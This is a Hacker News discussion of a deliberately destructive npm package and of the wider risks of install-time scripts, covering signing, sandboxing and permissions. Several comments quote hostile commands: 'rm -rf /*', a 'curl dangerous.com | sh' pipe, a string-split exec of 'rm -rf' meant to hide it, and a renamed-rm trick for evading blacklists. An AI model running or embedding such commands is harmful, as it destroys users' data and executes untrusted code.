Hacker News new | comments | show | ask | jobs | submit login
Npm install could be dangerous (github.com)
122 points by joaojeronimo on Jan 26, 2015 | hide | past | web | favorite | 97 comments



This applies to pretty much every pkg manager ever created.

That's why it's important to have end-to-end package signing with a reasonable UI, so people can choose to selectively trust the sources they need and get alerted before new dependencies get pulled in.

Sadly I don't know of any pkg manager that implements this correctly.


I find the apt package model to be very good (add trusted keys & repositories explicitly). What do you see as the shortcomings of apt compared to your ideal?


Yes, apt is indeed one of the best we have (the one-eyed amongst the blind).

Sadly it's still using a flawed[1] trust model where you trust repositories rather than publishers. And the UI-shim over GnuPG is 'basic' at best (to put it politely).

To add insult to injury deb/dpkg itself actually does contain a mechanism for package-level signing. But as far as I know no distro is using it.

To add even more insult to injury, all mobile platforms and both Windows and OSX have more reasonable package security models than Linux today.

[1] This is fine for guarding against compromised mirrors - and not much else.


The signing used by pacman (on arch) seems relatively nice, in that individual packages are signed by the maintainer rather than the repository.

Whether or not this buys you any extra security, I'm not sure. In reality I don't think many users check maintainer keys when asked if they want to trust them, but they could.


I'm not OP, but my opinion would be that APT does do some things better than npm etc but there's still some potential problems.

Probably one of the most obvious is that access to the repos is over unencrypted HTTP connections which opens the process up to tampering (depending on the attacker) for example injecting an older version of a package with a known security issue.


> for example injecting an older version of a package with a known security issue

There's a limited window during which an attack like this will work. If you look at one of the Release files [1], you'll notice the pseudo-header:

    Valid-Until: Wed, 04 Feb 2015 16:41:23 UTC
After this date passes, aptitude update will fail, warning you that your sources are out of date, with a message like:

    E: Release file for http://mirrors/debian/dists/wheezy-updates/Release is expired (invalid since 1h 24min 32s). Updates for this repository will not be applied.
Of course, the Release file is signed, so you can't just forge that pseudo-header (or change any of the packages in the release).

You could also choose one of the mirrors that supports HTTPS, like mirrors.kernel.org or mirrors.ocf.berkeley.edu (both good for Bay Area folks).

(Granted, the window is probably larger than we'd like, though you could write a script to check that if you wanted. Something like [2] would work.)

[1] http://mirrors.ocf.berkeley.edu/debian-security/dists/wheezy... [2] https://github.com/ocf/puppet/blob/master/modules/ocf_mirror...


I'm fairly certain there's some protection against that sort of attack. A quick google brings me to [1] which seems to indicate that the Release file has a 7-day expiration period. Having apt connect over unencrypted HTTP allows for caching options that npm doesn't. It's also not dependant on the shitty SSL CA system.

[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=499897


I guess its actually the package distribution that makes a difference, an apt package such as rimrafall won't ever reach an official debian repository. So in the context of adversary package code execution the weak spot is actually the npm registry policy and not npm packaging it self.


> This applies to pretty much every pkg manager ever created.

For what it's worth, the package manager for Dart does not have this problem. We specifically didn't add support for any kind of post-install hook because executing arbitrary code from transitive dependencies feels a little fishy to me, and I'm not at all a security person.

Unfortunately, there's lot of good uses for post-install hooks too. It's a hard problem.


> This applies to pretty much every pkg manager ever created.

This seems a bit more dangerous... to do this with apt, you need to MITM, since the Debian repos are ultimately checked by ftpmasters to make sure (amongst other things) that packages like rimrafall don't get in. Apt also has mitigations against MITM, as described elsewhere in this thread.

Who's checking what packages make it into npm? How did rimrafall get accepted as a package?


What do you find wrong with the yast/zypper's RPM repo signing methods? I've never seen it add a repo without prompting to accept the signing keys before adding it.


> This applies to pretty much every pkg manager ever created.

(noob question) Does it apply to PyPi/pip also?


Yes, the packages that pip installs contain a setup.py (created by the package author) and pip will run that as you when you're doing your pip install. The setup.py could do arbitrary bad things to you, like leaking your ssh keys, deleting your files, or whatever.


RPM.


If you run npm with root, npm will run scripts with the user "nobody" by default. This means that npm doesn't run scripts as root even if you run "npm install" with root.

You can set another user instead of nobody with the "user" option and you can disable switching UID/GID using the "unsafe-perm" option but DO NOT DO THIS.

More information here: https://docs.npmjs.com/misc/config

edit: added more details.


This is exactly why i think modern kernel level security layers, such as FreeBSD jails (or Docker/LXC) were born. Provided your app runs within a jail, it wouldn't matter much anymore:

> Once inside the jail, a process is not permitted to escape outside of this subtree

You could also develop within isolation, therefore your development env would be safer and even similar to a production environment. Needless to say, that has additional benefits.


I always develop inside a virtual machine, with a shared folder in between so I can write code on the host, but everything runs in the guest.


That's also a good solution I think. One of the main advantages of using containers though is real portability. This means in theory you could just push your container in development into production without too much hassle and making administrators nervous :) That's not the same level of portability a full VM would give you.

Admittedly this is more of a discussion about containers and security than npm itself but I'm interested in discovering the options out there. I may attempt to move all my stuff to containers for a bit and write about my findings.


I have found out the hard way that a `rm -rf /*` will delete the contents of a `/vagrant/` file...

Huzzah for git.


npmjs still contains the package: https://www.npmjs.com/search?q=rimrafall https://www.npmjs.com/package/rimrafall

'0 downloads in the last month'

There is no 'report package' button. The support link goes to a 'we are hiring' contact form. Report bad packages as security issues? https://www.npmjs.com/security

Package signing. Review process. Scanning tools for dangerous packages. As a user, don't trust anything and isolate containers and jails. Ban bad actors. Charge for a curated package index.

Lots of other plugin stores do better than npm.


"Scanning tools for dangerous packages"

This seems like an impossible problem (essentially the halting problem). On Linux perhaps you could build packages in a container then copy the results to the installation directory, but there's no guarantee require("rimrafall") won't just "child_process.exec('rm -rf /')".


At the very least, they could install packages in a VM and check that the VM can be rebooted.


Then someone could just craft a package that deletes every file except the ones required for booting...


I had the same thing - they have an abuse@ email in the Code of Conduct link that appears on every page. The email is the first thing listed. I've contacted them.


The package has now been removed.


that's interesting. Any pointers to package stores that do a better job on security? I'm researching the area a bit at the moment and I've not seen a lot of good practice out there, so would be interesting to have some good examples to hold up.


Fedora and RHEL have had mandatory signing since before either existed (back when it was RHL).

Debian has had what we'd call 'EV' level security these days for about 15 years - people bringing their passports in and reading out their GPG public keys at LUGs.


We haven't developed far enough for a package store at this point, but this is one of the use cases we're hoping to explore as part of our capability-based shell scripting language: shill-lang.org.


cool. If you're looking for thoughts about threat models and ways to do it http://theupdateframework.com/index.html seems to have some good info.


> […] as dangerous as `curl dangerous.com | sh`.

dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the html to sh is probably fine.


I often wonder about the results of people using functional hostnames in their examples. Most PoC exploit code use "target.com" as a place holder which makes sense, but hilariously is also the hostname for US retailer Target...


This is exactly the reason example.com exists


Yep. RFC2606 It is what they should use. And if you need to specify 2 hosts, you can use example.net and .org as well.

Unfortunately, the example domains don't convey context very well, so we see things like target.com, victim.com, etc


This can be corrected by target.example.com and victim.example.com. Conveys the context while remaining safe as an example.


That generally works, although in some cases it makes a difference whether two hosts are on the same tld; at the very least, it implies a connection between the two that may not always make sense (why is aggressor.example.com attacking victim.example.com?).


The same goes for TEST-NET (192.0.2.0/24), TEST-NET-2 (198.51.100.0/24), TEST-NET-3 (203.0.113.0/24), MCAST-TEST-NET (233.252.0.0/24), and the IPv6 documentation-only prefix (2001:db8::/32).


But of course they could do some fancy user agent check to only give malicious stuff when requested by curl.


heh. check out http://hashbang.sh it's both html and shell script :)


It's always been amateur hour over there. The 'official' install was `curl http://npmjs.org/install.sh | sh`[1], package checksums aren't uniformly checked, the list goes on.

But don't worry guys, they had a security audit[2].

[1] http://web.archive.org/web/20101228041356/http://npmjs.org/ [2] http://blog.npmjs.org/post/80277229932/newly-paranoid-mainta...


I could just as easily embed something like that in any code on any open source project in any language as part of the installer or the main code base.


It doesn't even have to be intentional malice:

https://news.ycombinator.com/item?id=8896186

https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issue...

You can limit the damage by keeping backups, and running software you don't really trust under a limited account. The latter is understandably more difficult with certain applications, but it's once again one of those security-usability tradeoffs.

I basically avoid installing much in the way of new software as much as I can, as my existing setup does what I need, and anything new gets subjected to careful scrutiny first, but this is not a workable solution for everyone. Nevertheless, I can see how those with an attitude that makes them very eager to install and try new software could also make them more vulnerable to things like this.


Bingo... pretty trivial to stick an `rm -rf /*` shell call somewhere in your code. Not sure what difference it makes whether it's in a package manager file, or the code. Lesson... read the code before running it.

Title of the post should be "Running code you haven't read can be dangerous"


A lot of people using package managers, though, might think that someone else has read the code that's about to be installed (so they don't have to read it before installing it). I've installed five or six things for development work using pip recently and I would have been shocked if they were malicious (or if I had to read thousands of lines of Python to make sure they weren't malicious).


It is interesting the contrast in cultures between developers and "hackers" it was not uncommon to hear about script kiddies picking up code and realizing later that a rm rf line was contained in the file. The common reaction to a scenario like that would be well the script kid got what he deserved. However, there is a fringe within that group that is more interested in testing these thing in VMs (so the damage would be minimal in that case). However when a security issue is brought to light like this and the only difference is the intentions of the user the arguments are so completely different. Script Kid downloads rm rf script and runs HAHA! Javascript Developer downloads package and runs blindly "well who let that happen and how do we stop it from happening again" hopefully some HN reader can respond to this to succinctly convey the philosophical mechanism going on here as I cannot quite place it.


Maybe the script kids think that they're playing One-Shot Prisoner's Dilemma (or occasionally Iterated Prisoner's Dilemma) and the developers think they're playing some other game?


Thanks for the reference schoen this is why I love HN. I sometimes have difficulty organizing thoughts into neatly categorized theories like this, best I can usually do is realize i'm sure somebody has thought about this before and explained better than I can.


Somehow I feel like using something that just simulates rm -rf /* would have brought the point across just as well and a bit safer...


But not as fun


Agreed, this is irresponsible.


There's warnings even in the description of the package:

    "name": "rimrafall",
    "version": "1.0.0",
    "description": "rm -rf /* # DO NOT INSTALL THIS",
How would you accidentally rm rf yourself with this?

A github issue "should" have sufficed, but it often doesn't. A practical demonstration is powerful enough to trigger immediate action.


Just another reason to install nodejs with a node versioning machine like nvm or n... or to chown your /usr dir so you don't have to run sudo every time you want to npm install. Since you need super user privileges to accidentally remove your system on most linux distros, it really helps if you don't form the habit of sudo npm installing everything.


I use n, but this would still try and delete everything it could - n doesn't chroot / contain/ zone / docker / rocket anything AFAIK.



Which will unfortunately prevent yourself from running sudo in the future, at least on Ubuntu. /usr/bin/sudo must be owned by uid 0.


Any package manager, especially one with fuzzy matching is extremely dangerous. Every time you do an install you are often pulling hundreds of modules from many many places. If any one of the codebases of a module were compromised even by a sneaky contributor, you could inject arbitrary code into any companies codebase/runtime.

Until object capability type systems become more popular, this will always be an issue. Unless you hand audit everything. Good luck being productive doing that, if you even have the skills or team members able to audit code.


It's not just Npm, RubyGems has essentially the same issue. I think the real lesson is "be careful what you install".


But do they need to have the issue? Why allow running arbitrary commands during install?

To me it is less about someone purposely including malicious code (since yes, that could be in the project itself not just the install) but that having this willy-nilly form of package managing opens up people to mistakes moving files around that do harm on accident.

And it gets even worse if the package is able to be added to a repo, like npmjs.org, and not have to be accepted after being reviewed.


There's not much difference between running a command on install and using an open source library. It's just as easy to to hide `exec("r" + "m" + " -r" + "f" + " .")` in source.


Rust/Cargo, homebrew, probably a host of others.


homebrew is at least curated and every time you update you see several packages removed


Well, to rubygems's credit they know post install scripts are a bad idea and they don't support it. The only way to do that in a gem is a hack based on extconf.rb (the original intent of this file being to compile native extensions).

But yes ultimately you are right.


This is a problem with most/all lib installers. They tend to have hooks to allow post-install actions and those hooks tend to be able to run OS commands, with the privileges of the installing user.

Of course what's extra worrying is it's not just the libs you directly install, but all their dependencies which get to carry out these actions. So for example when you install rails, it will install quite a large number of subsidiary gems.

Then when you add in the fact that the credentials that control dev access to push to places like rubygems and npm are just static username/password combos (which sometimes get stored in plain text in a dot file in the developers home dir) and that there's no common use of digital signing for issued libs (in some cases the installers don't even support it).


Well, even if it wasn't a post/pre install, even a node library can fork that exact command, upload your home directory, etc.

That's actually the reason it isn't just dangerous if run as root. Many people have huge amounts of sensitive information and data with read and write access.

A library could of course also fetch even more data. One could create an npm based botnet.


There are some things you can do to make `rm` safer which would prevent this from working: https://github.com/sindresorhus/guides/blob/master/how-not-t...

Though the real fix is doing development in a sandboxed container.



It works with the bash shell that comes with git for windows


So this doesn't strike me as an npm issue but something more fundamental: there is no easy way on any platform to define a set of rules for processes I invoke via the command line.

Like, it would be really really nice if I could wrap npm so it can only write to $HOME/.npm, /tmp and the current working directory - but I know of no system which will currently let me do that suitably dynamically.


Sudo and ACLs. There's a lot of power in there under the hood that a lot of people don't think of with these types of problems. For your specific use case, I'd start by creating a new user, something like $USER-npm-install. Next, I'd set acls on $HOME/.npm to allow write access with setfacl, something like setfacl -m u:$USER-npm-install:rwx $HOME/.npm .

For the actual script, I'd have it check to make sure that the current working directory is owned by you, then have it setfacl -m u:$USER-npm-install:rwx . to temporarily give the installer user access, then do sudo -u $USER-npm-install npm install Whatever . After it's done, I'd do sudo chown -R $USER . to get everything owned by you, and setfacl -m u:$USER-npm-install:--- . to revoke the permissions until needed for next time.

If my brain were suitably in gear, I'd give more than a 20000 foot view of what needs to be done, but those are the basics. A lot of people think of sudo as just being something for getting to root, but it is rather useful for creating sandboxed users for potentially dangerous actions as well. Create a user with just enough privileges to do what needs to be done, and have fun.


Selinux, apparmor, tomoyo, rbac already do this. They will need some configuration though if you want to use them with binaries in your home directory.


Unix user permissions take care of that.


Kinda. It would be nicer to limit permissions on a per-"application" level, requiring one-time explicit grants from the user, kinda like how a lot of platforms already do it (web browsers, Android APK, etc).


> It would be nicer to limit permissions on a per-"application" level, requiring one-time explicit grants from the user

Most services run under their own username/group for exactly this reason. A user should only be able to obliterate their `$HOME` folder and nothing else, and if you run npm as a certain user, you can restrict that even further by setting the right permissions. If you still need further protection from accidental deletions, it's probably a good idea to use a filesystem with snapshot support like ZFS or BTRFS.

Very few programs should be run as root, and developers should know this. Random scripts pulled from the internet are not in that list. If you absolutely need to be logged in as root, then it's probably best you run npm as a different user (runuser -l username -c command). I cannot imagine any reason why you would need to run `npm install` as root. Global packages? Perhaps users should chmod their global npm modules folder to allow installing as an unprivileged user, or at least as the npm user, and then run npm as that user. My global npm packages folder is owned by the npm user/group and if I need to install a global npm package, i usually run it as `runuser -l npm -c npm install -g ...` (or sudo -u npm on osx). It's not an extreme precaution and it's not even a hassle, and while I understand it's not the default, it's also not true that by default npm install can write or delete files outside of your home folder (unless run as root)

I'm not sure the title of this should be "npm install could be dangerous" more than "running scripts as root could be very dangerous", which is a no-brainer. The rule of thumb for users/admins in unix-like systems is to keep permissions as strict as possible.


The problem is this doesn't tally well with the overall user experience.

I don't want my hard drive being littered with files owned by not-me, because they don't work properly when I need to rsync things and I can't change their ownership easily etc.

What I want is a kind of "sub-user": where I have sudo like powers over files owned by my user account by default, which are then dropped for individual commands - or something similar.

Which comes back to my original point: we've lots of mechanisms, but none of them actually wrap-well or seamlessly with how you actually work which makes them too much of a pain to use for the 99% of the time when everything is fine.


Slight OT: does anyone know of any hacking/malware campaigns that were specifically aimed at developers (but not against a specific company)? Normal trojans sometimes steal game keys, I could imagine searching the disk for AWS keys might be profitable, too?


Computing could be dangerous.


More of a joke but:

npm install virus.exe

Perfect for the #scalenpm tshirts

https://github.com/peny/virus.exe


awareness for this is always good many now just have scripts doing curl blah | sudo and expecting the blah url will always serve the content they expect. signed versions seems to be the current best way to not have problems, even thus its not perfect.

And of course, most things like npm either dont support this or dont support it well, or nobody cares about it


The good part about npm is that if you run it as `sudo` it will de-authenticate when it's running any script in it's package files. So at least those won't be run with sudo permission.


Well, under no circumstance should you run npm, nvm, rvm, rbenv, pip, etc as root.


> can be as dangerous as curl dangerous.com | sh

What's dangerous.com?


Any site that serves up content that will be interpreted by `sh`.

Meaning, what happens if someone decides they want you to lose your home directory? They serve up the content "rm -rf ~". That doesn't even require privilege escalation, but it might ruin your day.


Let me rephrase:

Is dangerous.com a website with fame for such trick or it's just a name example?


It's a name example.


it would be cool if there was a way to show which commands npm was running in its scripts.


Or if it saw anything dangerous, it'd confirm that you want to run it.

Edit: Fair points on all the comments below, pardon my ignorance :)


See Halting Problem:

http://en.wikipedia.org/wiki/Halting_problem

ELI5: It is proven to be impossible to tell exactly what a program is going to do without executing it.


While that may be true for an unrestricted language, it doesn't need to be true of the programs we design. There's no reason that an installer needs to be written in a completely unrestricted way. NPM could use a DSL which would make it possible to review what an installer is going to do.

This is an idea I (with some collaborators) have explored in a more general way for secure shell scripting: shill-lang.org.


For systems like rubygems and npm, a build tool that installs the gems with sudo on a clean system and flags obvious issues would be a good thing.

(If the halting problem is a problem, try executing it in a sandbox.)


The Halting Problem says it’s impossible to tell whether a program will naturally finish what it’s going to do without doing it.

You can obviously tell what a trivial program will do by looking at it.


The problem is that identifying a dangerous command via a blacklist ends up being pretty difficult. This is why VMs and chroots and the like end up being so useful: the best way to make sure a command only accesses what it should is usually to give it specific explicit access to the resources it should have, rather than blacklisting what it can/cannot run.


How would it catch something like

  cp /bin/rm ponies ; ./ponies -rf /


The same way checkinstall detects which files have been installed - it overrides the relevant syscalls when running the program/script: http://asic-linux.com.mx/~izto/checkinstall/installwatch.htm...

Of course, not everything is as obvious to detect as deleting files :)


Well, checkinstall acts at the dynamic linking level. If you use ASM to call the syscall directly (or more generally, a statically linked binary) then checkinstall will not even see it (strace/DTrace/ktrace would.)


or you can create a ponies alias, even more harmless-looking


`--verbose`


Can I do the same with Makefiles?


It's possible to write malicious Makefiles that do things like:

    install:
        rm -rf /*
If you just `git clone <evil-repo> . && make` or `git clone <evil-repo> . && sudo make install` then sure, you'll be burned too. You should always check what a build system is going to do before running it.

Most people would expect that packages from a package manager have already been checked by someone who knows what they're doing before being made available to the public though (like Debian). This is apparently not the case for npm.




Applications are open for YC Winter 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: